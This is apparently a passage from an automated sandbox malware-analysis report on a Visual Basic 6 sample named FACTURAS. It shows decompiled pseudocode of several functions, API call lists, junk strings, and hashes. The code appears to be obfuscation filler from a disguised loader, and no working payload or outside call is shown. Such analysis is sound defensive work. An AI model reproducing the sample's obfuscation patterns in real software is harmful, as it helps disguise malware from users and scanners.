						_push(0x4223f0);
						_push(0x402d44);
						L0040162A();
						_v220 = 0x4223f0;
					}
					_v188 =  *_v220;
					_t188 =  *((intOrPtr*)( *_v188 + 0x14))(_v188,  &_v68);
					asm("fclex");
					_v192 = _t188;
					if(_v192 >= 0) {
						_t26 =  &_v224;
						 *_t26 = _v224 & 0x00000000;
						__eflags =  *_t26;
					} else {
						_push(0x14);
						_push(0x402d34);
						_push(_v188);
						_push(_v192);
						L00401624();
						_v224 = _t188;
					}
					_v196 = _v68;
					_t193 =  *((intOrPtr*)( *_v196 + 0xb8))(_v196,  &_v184);
					asm("fclex");
					_v200 = _t193;
					if(_v200 >= 0) {
						_t39 =  &_v228;
						 *_t39 = _v228 & 0x00000000;
						__eflags =  *_t39;
					} else {
						_push(0xb8);
						_push(0x402d54);
						_push(_v196);
						_push(_v200);
						L00401624();
						_v228 = _t193;
					}
					_v32 = _v184;
					L0040161E();
					_v140 = L"Chemotropism1";
					_v148 = 8;
					L0040160C();
					_push( &_v84);
					_push( &_v100);
					L004014E6();
					_push( &_v100);
					L004015AC();
					L00401672();
					_push( &_v100);
					_push( &_v84);
					_push(2);
					L00401654();
					_v140 = 0x4033d8;
					_v148 = 8;
					L0040160C();
					_push( &_v84);
					_push(0xc8);
					L00401486();
					L00401672();
					_t201 = _v64;
					_v212 = _t201;
					_v64 = _v64 & 0x00000000;
					_push(0xd1);
					L00401672();
					_push(_t201);
					L00401564();
					L00401672();
					L00401642();
					_push( &_v64);
					_push( &_v60);
					_push( &_v56);
					_push(3);
					L0040159A();
					_t263 = _t263 + 0x1c;
					L00401606();
					_push(L"Gatfinnes");
					L0040166C();
					L00401672();
					L00401642();
					L0040165A();
				}
				_v92 = 0x80020004;
				_v100 = 0xa;
				_v76 = 0x2cca9c;
				_v84 = 3;
				_push(1);
				_push(1);
				_push( &_v100);
				_push( &_v84);
				_push( &_v116);
				L0040164E();
				_v172 = L"Formindskedes7";
				_v180 = 0x8008;
				_push( &_v116);
				_t161 =  &_v180;
				_push(_t161);
				L00401480();
				_v188 = _t161;
				_push( &_v116);
				_push( &_v100);
				_push( &_v84);
				_push(3);
				L00401654();
				_t165 = _v188;
				if(_t165 != 0) {
					_v76 = 0x73b4a7;
					_v84 = 3;
					_push( &_v84);
					L00401540();
					L00401672();
					L00401606();
					if( *0x4223f0 != 0) {
						_v232 = 0x4223f0;
					} else {
						_push(0x4223f0);
						_push(0x402d44);
						L0040162A();
						_v232 = 0x4223f0;
					}
					_v188 =  *_v232;
					_t172 =  *((intOrPtr*)( *_v188 + 0x14))(_v188,  &_v68);
					asm("fclex");
					_v192 = _t172;
					if(_v192 >= 0) {
						_t109 =  &_v236;
						 *_t109 = _v236 & 0x00000000;
						__eflags =  *_t109;
					} else {
						_push(0x14);
						_push(0x402d34);
						_push(_v188);
						_push(_v192);
						L00401624();
						_v236 = _t172;
					}
					_v196 = _v68;
					_t177 =  *((intOrPtr*)( *_v196 + 0xf8))(_v196,  &_v56);
					asm("fclex");
					_v200 = _t177;
					if(_v200 >= 0) {
						_t122 =  &_v240;
						 *_t122 = _v240 & 0x00000000;
						__eflags =  *_t122;
					} else {
						_push(0xf8);
						_push(0x402d54);
						_push(_v196);
						_push(_v200);
						L00401624();
						_v240 = _t177;
					}
					_v216 = _v56;
					_v56 = _v56 & 0x00000000;
					L00401672();
					L0040161E();
					_push(0xc9);
					_push(L"PHYSIANTHROPY");
					L00401528();
					L00401672();
					L00401642();
					L0040165A();
					_v140 = L"APETALOUSNESS";
					_v148 = 8;
					L0040160C();
					_push(0xb2);
					_push( &_v84);
					_push( &_v100);
					L004014F8();
					_push( &_v100);
					L004015AC();
					L00401672();
					L00401642();
					L0040165A();
					_push( &_v100);
					_t165 =  &_v84;
					_push(_t165);
					_push(2);
					L00401654();
				}
				_v52 = 0x1724f8;
				asm("wait");
				_push(0x41faf3);
				L0040165A();
				L0040165A();
				L0040165A();
				L0040165A();
				L0040165A();
				return _t165;
			}

0x00402566
0x0041f5ac
0x0041f5bb
0x0041f5c7
0x0041f5cf
0x0041f5d2
0x0041f5d9
0x0041f5e8
0x0041f5f1
0x0041f5fc
0x0041f607
0x0041f60c
0x0041f612
0x0041f614
0x0041f615
0x0041f622
0x0041f63f
0x0041f624
0x0041f624
0x0041f629
0x0041f62e
0x0041f633
0x0041f633
0x0041f651
0x0041f669
0x0041f66c
0x0041f66e
0x0041f67b
0x0041f69d
0x0041f69d
0x0041f69d
0x0041f67d
0x0041f67d
0x0041f67f
0x0041f684
0x0041f68a
0x0041f690
0x0041f695
0x0041f695
0x0041f6a7
0x0041f6c2
0x0041f6c8
0x0041f6ca
0x0041f6d7
0x0041f6fc
0x0041f6fc
0x0041f6fc
0x0041f6d9
0x0041f6d9
0x0041f6de
0x0041f6e3
0x0041f6e9
0x0041f6ef
0x0041f6f4
0x0041f6f4
0x0041f70a
0x0041f711
0x0041f716
0x0041f720
0x0041f733
0x0041f73b
0x0041f73f
0x0041f740
0x0041f748
0x0041f749
0x0041f753
0x0041f75b
0x0041f75f
0x0041f760
0x0041f762
0x0041f76a
0x0041f774
0x0041f787
0x0041f78f
0x0041f790
0x0041f795
0x0041f79f
0x0041f7a4
0x0041f7a7
0x0041f7ad
0x0041f7b1
0x0041f7bf
0x0041f7c4
0x0041f7c5
0x0041f7cf
0x0041f7df
0x0041f7e7
0x0041f7eb
0x0041f7ef
0x0041f7f0
0x0041f7f2
0x0041f7f7
0x0041f7fd
0x0041f802
0x0041f807
0x0041f811
0x0041f821
0x0041f829
0x0041f829
0x0041f82e
0x0041f835
0x0041f83c
0x0041f843
0x0041f84a
0x0041f84c
0x0041f851
0x0041f855
0x0041f859
0x0041f85a
0x0041f85f
0x0041f869
0x0041f876
0x0041f877
0x0041f87d
0x0041f87e
0x0041f883
0x0041f88d
0x0041f891
0x0041f895
0x0041f896
0x0041f898
0x0041f8a0
0x0041f8a9
0x0041f8af
0x0041f8b6
0x0041f8c0
0x0041f8c1
0x0041f8cb
0x0041f8d3
0x0041f8df
0x0041f8fc
0x0041f8e1
0x0041f8e1
0x0041f8e6
0x0041f8eb
0x0041f8f0
0x0041f8f0
0x0041f90e
0x0041f926
0x0041f929
0x0041f92b
0x0041f938
0x0041f95a
0x0041f95a
0x0041f95a
0x0041f93a
0x0041f93a
0x0041f93c
0x0041f941
0x0041f947
0x0041f94d
0x0041f952
0x0041f952
0x0041f964
0x0041f97c
0x0041f982
0x0041f984
0x0041f991
0x0041f9b6
0x0041f9b6
0x0041f9b6
0x0041f993
0x0041f993
0x0041f998
0x0041f99d
0x0041f9a3
0x0041f9a9
0x0041f9ae
0x0041f9ae
0x0041f9c0
0x0041f9c6
0x0041f9d3
0x0041f9db
0x0041f9e0
0x0041f9e5
0x0041f9ea
0x0041f9f4
0x0041fa04
0x0041fa0c
0x0041fa11
0x0041fa1b
0x0041fa2e
0x0041fa33
0x0041fa3b
0x0041fa3f
0x0041fa40
0x0041fa48
0x0041fa49
0x0041fa53
0x0041fa63
0x0041fa6b
0x0041fa73
0x0041fa74
0x0041fa77
0x0041fa78
0x0041fa7a
0x0041fa7f
0x0041fa82
0x0041fa89
0x0041fa8a
0x0041facd
0x0041fad5
0x0041fadd
0x0041fae5
0x0041faed
0x0041faf2

APIs

__vbaChkstk.MSVBVM60(00000000,00401396,?,Wayment7,?), ref: 0041F5C7
__vbaStrCopy.MSVBVM60(?,?,?,00000000,00401396,?), ref: 0041F5F1
__vbaStrCopy.MSVBVM60(?,?,?,00000000,00401396,?), ref: 0041F5FC
__vbaFpCDblR8.MSVBVM60(?,?,?,00000000,00401396,?), ref: 0041F607
__vbaNew2.MSVBVM60(00402D44,004223F0,?,?,?,00000000,00401396,?), ref: 0041F62E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041F690
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000B8), ref: 0041F6EF
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000B8), ref: 0041F711
__vbaVarDup.MSVBVM60(00000000,?,00402D54,000000B8), ref: 0041F733
#528.MSVBVM60(?,?), ref: 0041F740
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F749
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041F753
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F762
__vbaVarDup.MSVBVM60 ref: 0041F787
#606.MSVBVM60(000000C8,?), ref: 0041F795
__vbaStrMove.MSVBVM60(000000C8,?), ref: 0041F79F
__vbaStrMove.MSVBVM60(000000D1,000000C8,?), ref: 0041F7BF
#514.MSVBVM60(00000000,000000D1,000000C8,?), ref: 0041F7C5
__vbaStrMove.MSVBVM60(00000000,000000D1,000000C8,?), ref: 0041F7CF
__vbaStrCopy.MSVBVM60(00000000,000000D1,000000C8,?), ref: 0041F7DF
#660.MSVBVM60(?,00000003,0000000A,00000001,00000001), ref: 0041F85A
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041F87E
__vbaFreeVarList.MSVBVM60(00000003,00000003,0000000A,?,00008008,?), ref: 0041F898
#536.MSVBVM60(00000003), ref: 0041F8C1
__vbaStrMove.MSVBVM60(00000003), ref: 0041F8CB
__vbaFreeVar.MSVBVM60(00000003), ref: 0041F8D3
__vbaNew2.MSVBVM60(00402D44,004223F0,00000003), ref: 0041F8EB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041F94D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041F9A9
__vbaStrMove.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041F9D3
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041F9DB
#512.MSVBVM60(PHYSIANTHROPY,000000C9), ref: 0041F9EA

Strings

Gatfinnes, xrefs: 0041F802
PHYSIANTHROPY, xrefs: 0041F9E5
APETALOUSNESS, xrefs: 0041FA11
Chemotropism1, xrefs: 0041F716

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Move$Free$CheckHresult$Copy$ListNew2$#512#514#528#536#606#660Chkstk
String ID: APETALOUSNESS$Chemotropism1$Gatfinnes$PHYSIANTHROPY
API String ID: 1955365611-2305312325
Opcode ID: 16d6795c5c28a47c3c6ddddedfa4f20aac65ff98b6dc54da51977e5c6a567074
Instruction ID: 732b38055afd9a27224fea2122834edf62b8d72386851646c05db079df4f24cb
Opcode Fuzzy Hash: 16d6795c5c28a47c3c6ddddedfa4f20aac65ff98b6dc54da51977e5c6a567074
Instruction Fuzzy Hash: DDD13571900218ABDB10EFA1CC55FDEB7B9BF04304F1445BAE10ABB1A1DB785A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041DC5D, Relevance: 87.7, APIs: 45, Strings: 5, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E0041DC5D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				void* _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				intOrPtr* _v176;
				signed int _v180;
				signed int _v184;
				char* _t102;
				char* _t107;
				char* _t112;
				char* _t115;
				signed int _t121;
				signed int _t126;
				void* _t171;
				void* _t173;
				intOrPtr _t174;

				_t174 = _t173 - 0x18;
				 *[fs:0x0] = _t174;
				L00401390();
				_v28 = _t174;
				_v24 = 0x401248;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401396, _t171);
				_v8 = 1;
				L00401642();
				_v8 = 2;
				_v80 = 0x95;
				_v88 = 2;
				_t102 =  &_v88;
				_push(_t102);
				L0040153A();
				L00401672();
				_push(_t102);
				L004015FA();
				_v96 = _t102;
				_v104 = 3;
				_push( &_v104);
				L00401540();
				L00401672();
				L00401642();
				_push( &_v60);
				_push( &_v56);
				_push(2);
				L0040159A();
				_push( &_v104);
				_t107 =  &_v88;
				_push(_t107);
				_push(2);
				L00401654();
				_v8 = 3;
				_push(L"Julentters7");
				L004015FA();
				_push(_t107);
				L00401600();
				L00401672();
				_push(_t107);
				L00401534();
				L00401672();
				_push(_t107);
				_push(0xf);
				_push(L"Ellagate");
				L00401528();
				L00401672();
				_push(_t107);
				L0040152E();
				L00401672();
				_push(_t107);
				L0040156A();
				_v140 =  ~(0 | _t107 >= 0x00000000);
				_push( &_v68);
				_push( &_v64);
				_push( &_v60);
				_push( &_v56);
				_push(4);
				L0040159A();
				_t112 = _v140;
				if(_t112 != 0) {
					_v8 = 4;
					_push(0xffffffff);
					L00401636();
					_v8 = 5;
					_push(L"18:18:18");
					_push( &_v88);
					L0040155E();
					_push( &_v88);
					_t115 =  &_v56;
					_push(_t115);
					L00401666();
					_push(_t115);
					L00401522();
					_v48 = _t115;
					L0040165A();
					L00401606();
					_v8 = 6;
					if( *0x4223f0 != 0) {
						_v176 = 0x4223f0;
					} else {
						_push(0x4223f0);
						_push(0x402d44);
						L0040162A();
						_v176 = 0x4223f0;
					}
					_v140 =  *_v176;
					_t121 =  *((intOrPtr*)( *_v140 + 0x14))(_v140,  &_v72);
					asm("fclex");
					_v144 = _t121;
					if(_v144 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402d34);
						_push(_v140);
						_push(_v144);
						L00401624();
						_v180 = _t121;
					}
					_v148 = _v72;
					_t126 =  *((intOrPtr*)( *_v148 + 0x60))(_v148,  &_v56);
					asm("fclex");
					_v152 = _t126;
					if(_v152 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x402d54);
						_push(_v148);
						_push(_v152);
						L00401624();
						_v184 = _t126;
					}
					L00401642();
					L0040165A();
					L0040161E();
					_v8 = 7;
					_v80 = 0xa7618200;
					_v76 = 0x5af6;
					_v88 = 6;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_t112 =  &_v88;
					_push(_t112);
					L0040151C();
					L00401672();
					L00401642();
					L0040165A();
					L00401606();
					_v8 = 8;
					_push(_v40);
					_push("ORY");
					L00401516();
					L00401672();
					_push(_t112);
					_push(L"Spindersken");
					L00401516();
					L00401672();
					L0040165A();
				}
				_v8 = 0xa;
				_v44 = 0x31dc32;
				_push(0x41e005);
				L0040165A();
				L0040165A();
				return _t112;
			}

0x0041dc60
0x0041dc6f
0x0041dc7b
0x0041dc83
0x0041dc86
0x0041dc8d
0x0041dc94
0x0041dca3
0x0041dca6
0x0041dcb3
0x0041dcb8
0x0041dcbf
0x0041dcc6
0x0041dccd
0x0041dcd0
0x0041dcd1
0x0041dcdb
0x0041dce0
0x0041dce1
0x0041dce6
0x0041dce9
0x0041dcf3
0x0041dcf4
0x0041dcfe
0x0041dd0b
0x0041dd13
0x0041dd17
0x0041dd18
0x0041dd1a
0x0041dd25
0x0041dd26
0x0041dd29
0x0041dd2a
0x0041dd2c
0x0041dd34
0x0041dd3b
0x0041dd40
0x0041dd45
0x0041dd46
0x0041dd50
0x0041dd55
0x0041dd56
0x0041dd60
0x0041dd65
0x0041dd66
0x0041dd68
0x0041dd6d
0x0041dd77
0x0041dd7c
0x0041dd7d
0x0041dd87
0x0041dd8c
0x0041dd8d
0x0041dd9b
0x0041dda5
0x0041dda9
0x0041ddad
0x0041ddb1
0x0041ddb2
0x0041ddb4
0x0041ddbc
0x0041ddc5
0x0041ddcb
0x0041ddd2
0x0041ddd4
0x0041ddd9
0x0041dde0
0x0041dde8
0x0041dde9
0x0041ddf1
0x0041ddf2
0x0041ddf5
0x0041ddf6
0x0041ddfb
0x0041ddfc
0x0041de01
0x0041de07
0x0041de0f
0x0041de14
0x0041de22
0x0041de3f
0x0041de24
0x0041de24
0x0041de29
0x0041de2e
0x0041de33
0x0041de33
0x0041de51
0x0041de69
0x0041de6c
0x0041de6e
0x0041de7b
0x0041de9d
0x0041de7d
0x0041de7d
0x0041de7f
0x0041de84
0x0041de8a
0x0041de90
0x0041de95
0x0041de95
0x0041dea7
0x0041debf
0x0041dec2
0x0041dec4
0x0041ded1
0x0041def3
0x0041ded3
0x0041ded3
0x0041ded5
0x0041deda
0x0041dee0
0x0041dee6
0x0041deeb
0x0041deeb
0x0041df03
0x0041df0b
0x0041df13
0x0041df18
0x0041df1f
0x0041df26
0x0041df2d
0x0041df34
0x0041df36
0x0041df38
0x0041df3a
0x0041df3c
0x0041df3f
0x0041df40
0x0041df4a
0x0041df5a
0x0041df62
0x0041df6a
0x0041df6f
0x0041df76
0x0041df79
0x0041df7e
0x0041df88
0x0041df8d
0x0041df8e
0x0041df93
0x0041df9d
0x0041dfa5
0x0041dfa5
0x0041dfaa
0x0041dfb1
0x0041dfb8
0x0041dff7
0x0041dfff
0x0041e004

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041DC7B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0041DCB3
#572.MSVBVM60(00000002), ref: 0041DCD1
__vbaStrMove.MSVBVM60(00000002), ref: 0041DCDB
__vbaLenBstr.MSVBVM60(00000000,00000002), ref: 0041DCE1
#536.MSVBVM60(00000003,?,?,00000000,00000002), ref: 0041DCF4
__vbaStrMove.MSVBVM60(00000003,?,?,00000000,00000002), ref: 0041DCFE
__vbaStrCopy.MSVBVM60(00000003,?,?,00000000,00000002), ref: 0041DD0B
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000003,?,?,00000000,00000002), ref: 0041DD1A
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00401396), ref: 0041DD2C
__vbaLenBstr.MSVBVM60(Julentters7,?,?,?,?,?,00401396), ref: 0041DD40
__vbaStrI4.MSVBVM60(00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD46
__vbaStrMove.MSVBVM60(00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD50
#517.MSVBVM60(00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD56
__vbaStrMove.MSVBVM60(00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD60
#512.MSVBVM60(Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD6D
__vbaStrMove.MSVBVM60(Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD77
#521.MSVBVM60(00000000,Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD7D
__vbaStrMove.MSVBVM60(00000000,Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD87
__vbaStrCmp.MSVBVM60(00000000,00000000,Ellagate,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DD8D
__vbaFreeStrList.MSVBVM60(00000004,?,00000000,00000000,00000000,00000000,00000000,Ellagate,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DDB4
__vbaOnError.MSVBVM60(000000FF,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DDD4
#541.MSVBVM60(?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DDE9
__vbaStrVarVal.MSVBVM60(?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7,?,?,?,?,?,00401396), ref: 0041DDF6
#578.MSVBVM60(00000000,?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DDFC
__vbaFreeStr.MSVBVM60(00000000,?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DE07
__vbaFreeVar.MSVBVM60(00000000,?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DE0F
__vbaNew2.MSVBVM60(00402D44,004223F0,00000000,?,?,?,18:18:18,000000FF,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DE2E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041DE90
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,00000060), ref: 0041DEE6
__vbaStrCopy.MSVBVM60(00000000,?,00402D54,00000060), ref: 0041DF03
__vbaFreeStr.MSVBVM60(00000000,?,00402D54,00000060), ref: 0041DF0B
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,00000060), ref: 0041DF13
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF40
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF4A
__vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF5A
__vbaFreeStr.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF62
__vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF6A
__vbaStrCat.MSVBVM60(ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF7E
__vbaStrMove.MSVBVM60(ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF88
__vbaStrCat.MSVBVM60(Spindersken,00000000,ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF93
__vbaStrMove.MSVBVM60(Spindersken,00000000,ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DF9D
__vbaFreeStr.MSVBVM60(Spindersken,00000000,ORY,?,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0041DFA5
__vbaFreeStr.MSVBVM60(0041E005,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DFF7
__vbaFreeStr.MSVBVM60(0041E005,0000000F,00000000,00000000,00000000,Julentters7), ref: 0041DFFF

Strings

18:18:18, xrefs: 0041DDE0
Spindersken, xrefs: 0041DF8E
Ellagate, xrefs: 0041DD68
Julentters7, xrefs: 0041DD3B
ORY, xrefs: 0041DF79

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$Copy$List$BstrCheckHresult$#512#517#521#536#541#572#578#703ChkstkErrorNew2
String ID: 18:18:18$Ellagate$Julentters7$ORY$Spindersken
API String ID: 1281597053-645609369
Opcode ID: ccabde8878ab7179b76e5d42c4046a2c41d0b470078240cda4dea7da4b9a5a5c
Instruction ID: b2992b798e6caff2460da47ab91e29450ee0ed1523a875fe7bb5fa0d7dd09224
Opcode Fuzzy Hash: ccabde8878ab7179b76e5d42c4046a2c41d0b470078240cda4dea7da4b9a5a5c
Instruction Fuzzy Hash: A1913E71D00208ABDB00EFA1DD56FDEB7B9AF14308F20456AF106BB1E1DB795E458B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDD6, Relevance: 58.0, APIs: 30, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E0041FDD6(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				short _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char _v100;
				intOrPtr _v108;
				char _v116;
				char* _v140;
				intOrPtr _v148;
				char* _v156;
				intOrPtr _v164;
				short _v168;
				signed int _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				char* _t132;
				signed int _t134;
				signed int _t144;
				short _t145;
				signed int _t156;
				signed int _t161;
				signed int _t169;
				signed int _t174;
				intOrPtr _t202;

				_push(0x401396);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t202;
				L00401390();
				_v12 = _t202;
				_v8 = 0x401328;
				_push(L"EKSPROPRIATIONSFORRETNINGER");
				L00401588();
				_v44 = 0xc8;
				_v52 = 3;
				_push( &_v52);
				L0040146E();
				L00401672();
				_v192 = _v32;
				_v32 = _v32 & 0x00000000;
				_v60 = _v192;
				_v68 = 8;
				_push(0xae);
				_push( &_v68);
				_push( &_v84);
				L004014DA();
				_v156 = L"userprofile";
				_v164 = 8;
				L0040160C();
				_t132 =  &_v100;
				_push(_t132);
				L004015DC();
				_v108 = _t132;
				_v116 = 0x8008;
				_push( &_v84);
				_t134 =  &_v116;
				_push(_t134);
				L00401480();
				_v172 = _t134;
				L0040165A();
				_push( &_v116);
				_push( &_v84);
				_push( &_v100);
				_push( &_v68);
				_push( &_v52);
				_push(5);
				L00401654();
				if(_v172 != 0) {
					_v140 = L"Wickiups";
					_v148 = 8;
					L0040160C();
					_push( &_v52);
					_push( &_v68);
					L004014E6();
					_push( &_v68);
					L004015AC();
					L00401672();
					L00401642();
					L0040165A();
					_push( &_v68);
					_push( &_v52);
					_push(2);
					L00401654();
					if( *0x4223f0 != 0) {
						_v196 = 0x4223f0;
					} else {
						_push(0x4223f0);
						_push(0x402d44);
						L0040162A();
						_v196 = 0x4223f0;
					}
					_v172 =  *_v196;
					_t156 =  *((intOrPtr*)( *_v172 + 0x14))(_v172,  &_v36);
					asm("fclex");
					_v176 = _t156;
					if(_v176 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402d34);
						_push(_v172);
						_push(_v176);
						L00401624();
						_v200 = _t156;
					}
					_v180 = _v36;
					_t161 =  *((intOrPtr*)( *_v180 + 0xc8))(_v180,  &_v168);
					asm("fclex");
					_v184 = _t161;
					if(_v184 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0xc8);
						_push(0x402d54);
						_push(_v180);
						_push(_v184);
						L00401624();
						_v204 = _t161;
					}
					 *((short*)(_a4 + 0x100)) = _v168;
					L0040161E();
					_push( &_v52);
					L00401468();
					L0040157C();
					L00401606();
					if( *0x4223f0 != 0) {
						_v208 = 0x4223f0;
					} else {
						_push(0x4223f0);
						_push(0x402d44);
						L0040162A();
						_v208 = 0x4223f0;
					}
					_v172 =  *_v208;
					_t169 =  *((intOrPtr*)( *_v172 + 0x14))(_v172,  &_v36);
					asm("fclex");
					_v176 = _t169;
					if(_v176 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402d34);
						_push(_v172);
						_push(_v176);
						L00401624();
						_v212 = _t169;
					}
					_v180 = _v36;
					_t174 =  *((intOrPtr*)( *_v180 + 0x140))(_v180,  &_v168);
					asm("fclex");
					_v184 = _t174;
					if(_v184 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x402d54);
						_push(_v180);
						_push(_v184);
						L00401624();
						_v216 = _t174;
					}
					_v28 = _v168;
					L0040161E();
				}
				L00401630();
				_t144 =  *((intOrPtr*)( *_a4 + 0x90))(_a4,  &_v168);
				asm("fclex");
				_v172 = _t144;
				if(_v172 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0x90);
					_push(0x402958);
					_push(_a4);
					_push(_v172);
					L00401624();
					_v220 = _t144;
				}
				_t145 = _v168;
				_v24 = _t145;
				_push(0x4201fa);
				return _t145;
			}

0x0041fddb
0x0041fde6
0x0041fde7
0x0041fdf3
0x0041fdfb
0x0041fdfe
0x0041fe05
0x0041fe0a
0x0041fe0f
0x0041fe12
0x0041fe1c
0x0041fe1d
0x0041fe27
0x0041fe2f
0x0041fe35
0x0041fe3f
0x0041fe42
0x0041fe49
0x0041fe51
0x0041fe55
0x0041fe56
0x0041fe5b
0x0041fe65
0x0041fe78
0x0041fe7d
0x0041fe80
0x0041fe81
0x0041fe86
0x0041fe89
0x0041fe93
0x0041fe94
0x0041fe97
0x0041fe98
0x0041fe9d
0x0041fea7
0x0041feaf
0x0041feb3
0x0041feb7
0x0041febb
0x0041febf
0x0041fec0
0x0041fec2
0x0041fed3
0x0041fed9
0x0041fee3
0x0041fef6
0x0041fefe
0x0041ff02
0x0041ff03
0x0041ff0b
0x0041ff0c
0x0041ff16
0x0041ff26
0x0041ff2e
0x0041ff36
0x0041ff3a
0x0041ff3b
0x0041ff3d
0x0041ff4c
0x0041ff69
0x0041ff4e
0x0041ff4e
0x0041ff53
0x0041ff58
0x0041ff5d
0x0041ff5d
0x0041ff7b
0x0041ff93
0x0041ff96
0x0041ff98
0x0041ffa5
0x0041ffc7
0x0041ffa7
0x0041ffa7
0x0041ffa9
0x0041ffae
0x0041ffb4
0x0041ffba
